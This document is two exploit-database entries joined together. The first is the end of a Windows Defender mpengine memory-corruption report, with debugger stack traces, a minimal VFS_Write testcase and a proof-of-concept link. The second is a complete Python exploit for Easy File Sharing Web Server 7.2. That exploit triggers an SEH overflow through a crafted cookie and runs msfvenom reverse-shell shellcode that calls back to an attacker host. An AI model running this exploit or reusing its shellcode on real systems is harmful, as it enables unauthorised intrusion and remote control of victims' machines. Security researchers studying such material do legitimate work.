0192e858 6682c1a7 94741586 0cb26e40 11069948 mpengine!_rsignal+0x3479f
0192e880 668266f5 947414e2 00000000 0192eb34 mpengine+0x20c1a7
0192e9e4 668251ce 0192eb34 0cb26e40 00001000 mpengine+0x2066f5
0192ea38 66822fd1 0cb26e40 109ee478 00001000 mpengine+0x2051ce
0192eab0 66823127 0192eae0 0192eb34 00000000 mpengine+0x202fd1
0192eba8 66822d18 0192ec00 0192ec54 00000000 mpengine+0x203127
0192ec70 66823533 0192ec98 110c02e0 947411c2 mpengine+0x202d18
0192ecc4 668244b5 110c02e0 947411fa 106bde30 mpengine+0x203533
0192ecfc 66824593 110c02e0 94741382 00000000 mpengine+0x2044b5
0192ee84 6682085f 0192f7dc 00000000 003e7cd8 mpengine+0x204593
0192ee9c 6682088b 0192eeb8 66823dd2 0192f7dc mpengine+0x20085f
0192eea4 66823dd2 0192f7dc 0192f7dc 947413be mpengine+0x20088b
0192eeb8 66820829 0192f7dc 003e7cd8 66820790 mpengine+0x203dd2
0192eed8 66823d4a 0192f7dc 00000000 9474121a mpengine+0x200829
0192ef1c 6682d2a0 0192f7dc 0000800c 0192f7dc mpengine+0x203d4a
0192ef30 668820be 947409ce 66881ba0 00370bf8 mpengine+0x20d2a0
0192f4c8 66881b5f 00004039 0192f7dc 00000030 mpengine!_rsignal+0x76e
0192f4f0 66881a1e 0192f7dc 00000030 94740bfe mpengine!_rsignal+0x20f
0192f6f8 66881987 0192f7dc 00000030 0192f758 mpengine!_rsignal+0xce
0192f708 71436eff 003d5c60 00004039 0192f7dc mpengine!_rsignal+0x37
0192f758 7061480b 003d5bf8 00004039 0192f7dc mpsvc!rsignal_wrapper+0xef (FPO: [Non-Fpo])
0192f784 706478b4 0192f7dc 0192f828 00000000 mprtp!RealtimeProtection::CCMEngine::NotifyChange+0x7e (FPO: [1,2,0])
0192f7a0 70647b53 9479983c 00000004 70647900 mprtp!RealtimeProtection::MpNotifyChangeEx+0x9a (FPO: [Non-Fpo])
0192f870 70646b0a 01dfa2a8 01dda8b8 01dfa2a8 mprtp!RealtimeProtection::MpOpenProcessNotificationWorker+0x253 (FPO: [Non-Fpo])
0192f888 70649aec 70649ab0 01dda8b0 0192f8ac mprtp!RealtimeProtection::AsyncNotificationWorker+0x86 (FPO: [Non-Fpo])
0192f898 70617e47 005209e8 70617dd0 947998e0 mprtp!RealtimeProtection::CAsyncNotificationWorkItem::ExecuteJob+0x3c (FPO: [0,1,4])
0192f8ac 73f3389a 01dda8b8 947c55e2 76f7268c mprtp!CommonUtil::CMpThreadPoolItemBase::DoAction+0x77 (FPO: [Non-Fpo])
0192f8e8 76f126d5 0192f948 0051c2b8 003a0c00 mpclient!CommonUtil::CMpThreadPoolProviderVista::WorkCallback+0xca (FPO: [Non-Fpo])
0192f90c 76f30774 0192f948 003a0c60 77749e94 ntdll!TppWorkpExecuteCallback+0x10f (FPO: [Non-Fpo])
0192fa5c 75f1ef8c 003a4e58 0192faa8 76f6367a ntdll!TppWorkerThread+0x562 (FPO: [Non-Fpo])
0192fa68 76f6367a 003a4e58 77749e60 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
0192faa8 76f6364d 76f302cb 003a4e58 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])
0192fac0 00000000 76f302cb 003a4e58 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
2: kd> lmv m mpengine
start end module name
66620000 67015000 mpengine (export symbols) mpengine.dll
Loaded symbol image file: mpengine.dll
Image path: c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{CCD47945-D7B4-402F-99F0-622F76161ECD}\mpengine.dll
Image name: mpengine.dll
Timestamp: Tue May 23 10:52:27 2017 (592476DB)
CheckSum: 00A1867D
ImageSize: 009F5000
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
################################################################################
I had some time to minimize the bug, a minimal testcase would be this:
MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0, 0xffffffff, 0);
MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0x7ff, 0x41414141, 0);
The first call extends the length of the file to nOffset, but because the numberOfBytes parameter is 0 no space is allocated. Then you can read and write arbitrary data to an arbitrary offset to the MutableByteStream object buffer. This is a very powerful exploit primitive, and exploitation does not seem difficult.
################################################################################
Here is a better testcase that crashes in a memcpy to a bad destination offset.
(gdb) r
Starting program: mpclient testcase.exe
main(): Scanning testcase.exe...
EngineScanCallback(): Scanning input
Program received signal SIGSEGV, Segmentation fault.
0xf6e98c08 in ?? ()
(gdb) x/i $pc
=> 0xf6e98c08: rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
(gdb) p/x $edi
$1 = 0xc7028a20
(gdb) p/x $esi
$2 = 0x843e228
(gdb) x/10xb $esi
0x843e228: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x843e230: 0x00 0x00
(gdb) x/10xb $edi
0xc7028a20: Cannot access memory at address 0xc7028a20
(gdb) r
################################################################################
stacktrace on windows:
2: kd> r
eax=c7c13828 ebx=1ca71d90 ecx=00000400 edx=00001000 esi=1ca71d90 edi=db6625b8
eip=669c44e0 esp=0242c210 ebp=0242c234 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mpengine!memcpy+0x250:
001b:669c44e0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
2: kd> dd edi
db6625b8 ???????? ???????? ???????? ????????
db6625c8 ???????? ???????? ???????? ????????
db6625d8 ???????? ???????? ???????? ????????
db6625e8 ???????? ???????? ???????? ????????
db6625f8 ???????? ???????? ???????? ????????
db662608 ???????? ???????? ???????? ????????
db662618 ???????? ???????? ???????? ????????
db662628 ???????? ???????? ???????? ????????
2: kd> kv
ChildEBP RetAddr Args to Child
0242c214 66a84a47 db6625b8 1ca71d90 00001000 mpengine!memcpy+0x250 (FPO: [3,0,2])
0242c234 66d73203 1ca71d90 00001000 00001000 mpengine!std::list<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> >,std::allocator<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> > > >::erase+0x72 (FPO: [Non-Fpo])
0242c258 66d732b9 1ca76db8 00001000 41414000 mpengine!Modification::read+0x79 (FPO: [Non-Fpo])
0242c2a0 66d736db 1ca76db8 00001000 41414000 mpengine!MutableStore::MutableByteStream::read+0xa3 (FPO: [Non-Fpo])
0242c2dc 66d737db 02f923e4 000007ff 41414141 mpengine!MutableStore::MutableByteStream::write+0xa0 (FPO: [Non-Fpo])
0242c320 66d6dfbb 00000544 02f923e4 000007ff mpengine!MutableStore::writeStrm+0xab (FPO: [Non-Fpo])
0242c35c 66d6b463 00000596 02f923e4 000007ff mpengine!VirtualFS::write+0x79 (FPO: [4,5,4])
0242c3a0 66c1eea8 02f923e4 000007ff 41414141 mpengine!VFS_Write+0x34 (FPO: [Non-Fpo])
0242c410 66b71e01 02ed0020 02f20610 fdeee3e7 mpengine!NTDLL_DLL_VFS_Write+0x78 (FPO: [Non-Fpo])
0242c440 66d840da 02f203a8 0309877f 02f20601 mpengine!__call_api_by_crc+0x114 (FPO: [Non-Fpo])
0242c468 030987a8 669eeca2 02f203a8 0309877f mpengine!x32_parseint+0x1ba (FPO: [Non-Fpo])
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42264.zip

View file

@ -0,0 +1,91 @@
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH)
# Date: 19 June 2017
# Exploit Author: clubjk
# Author Contact: jk@jkcybersecurity.com
# Vendor Homepage: http://www.sharing-file.com
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: Easy File Sharing Web Server 7.2
# Tested on: WinXP SP3
# Usage: ./exploit.py
# [*] Connecting to Target 192.168.188.132...standby...
# [*] Successfully connected to 192.168.188.132...
# [*] Sending improperly formed request...
# [!] Request has been sent!
import socket,os,time, sys
host = "192.168.188.132"
port = 80
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.188.133 LPORT=2345 -f py -b "\x00"
buf = ""
buf += "\xdb\xd2\xd9\x74\x24\xf4\x5f\xba\xb7\xe7\x7d\x1e\x29"
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x57\x13\x03\xe0\xf4\x9f"
buf += "\xeb\xf2\x13\xdd\x14\x0a\xe4\x82\x9d\xef\xd5\x82\xfa"
buf += "\x64\x45\x33\x88\x28\x6a\xb8\xdc\xd8\xf9\xcc\xc8\xef"
buf += "\x4a\x7a\x2f\xde\x4b\xd7\x13\x41\xc8\x2a\x40\xa1\xf1"
buf += "\xe4\x95\xa0\x36\x18\x57\xf0\xef\x56\xca\xe4\x84\x23"
buf += "\xd7\x8f\xd7\xa2\x5f\x6c\xaf\xc5\x4e\x23\xbb\x9f\x50"
buf += "\xc2\x68\x94\xd8\xdc\x6d\x91\x93\x57\x45\x6d\x22\xb1"
buf += "\x97\x8e\x89\xfc\x17\x7d\xd3\x39\x9f\x9e\xa6\x33\xe3"
buf += "\x23\xb1\x80\x99\xff\x34\x12\x39\x8b\xef\xfe\xbb\x58"
buf += "\x69\x75\xb7\x15\xfd\xd1\xd4\xa8\xd2\x6a\xe0\x21\xd5"
buf += "\xbc\x60\x71\xf2\x18\x28\x21\x9b\x39\x94\x84\xa4\x59"
buf += "\x77\x78\x01\x12\x9a\x6d\x38\x79\xf3\x42\x71\x81\x03"
buf += "\xcd\x02\xf2\x31\x52\xb9\x9c\x79\x1b\x67\x5b\x7d\x36"
buf += "\xdf\xf3\x80\xb9\x20\xda\x46\xed\x70\x74\x6e\x8e\x1a"
buf += "\x84\x8f\x5b\x8c\xd4\x3f\x34\x6d\x84\xff\xe4\x05\xce"
buf += "\x0f\xda\x36\xf1\xc5\x73\xdc\x08\x8e\xbb\x89\xae\xcb"
buf += "\x54\xc8\xce\xda\x8d\x45\x28\xb6\xdd\x03\xe3\x2f\x47"
buf += "\x0e\x7f\xd1\x88\x84\xfa\xd1\x03\x2b\xfb\x9c\xe3\x46"
buf += "\xef\x49\x04\x1d\x4d\xdf\x1b\x8b\xf9\x83\x8e\x50\xf9"
buf += "\xca\xb2\xce\xae\x9b\x05\x07\x3a\x36\x3f\xb1\x58\xcb"
buf += "\xd9\xfa\xd8\x10\x1a\x04\xe1\xd5\x26\x22\xf1\x23\xa6"
buf += "\x6e\xa5\xfb\xf1\x38\x13\xba\xab\x8a\xcd\x14\x07\x45"
buf += "\x99\xe1\x6b\x56\xdf\xed\xa1\x20\x3f\x5f\x1c\x75\x40"
buf += "\x50\xc8\x71\x39\x8c\x68\x7d\x90\x14\x98\x34\xb8\x3d"
buf += "\x31\x91\x29\x7c\x5c\x22\x84\x43\x59\xa1\x2c\x3c\x9e"
buf += "\xb9\x45\x39\xda\x7d\xb6\x33\x73\xe8\xb8\xe0\x74\x39"
crash = "/.:/" #unusual but needed
crash += "A"*53 #offset
crash += "\xeb\x10\x90\x90" #seh
crash += "\x05\x86\x01\x10" #pop pop ret ImageLoad.dll (WinXP SP3)
crash += "D"*10 #junk
crash += buf #shellcode
crash += "E"*2600 #total string needs to be about 3000 chars
request = "GET /vfolder.ghp HTTP/1.1\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Referer: " + "http://" + host + "/" + "\r\n"
request += "Cookie: SESSIONID=16246; UserID=PassWD=" + crash + "; frmUserName=; frmUserPass=;"
request += " rememberPass=202.197.208.215.201"
request += "\r\n"
request += "Connection: keep-alive" + "\r\n"
request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
print "[*] Connecting to Target " + host + "...standby..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((host, port))
print "[*] Successfully connected to " + host + "!!!"
except:
print "[!] " + host + " didn't respond\n"
sys.exit(0)
print "[*] Sending improperly formed request..."
s.send(request + "\r\n\r\n")
print "[!] Request has been sent!\n"
s.close()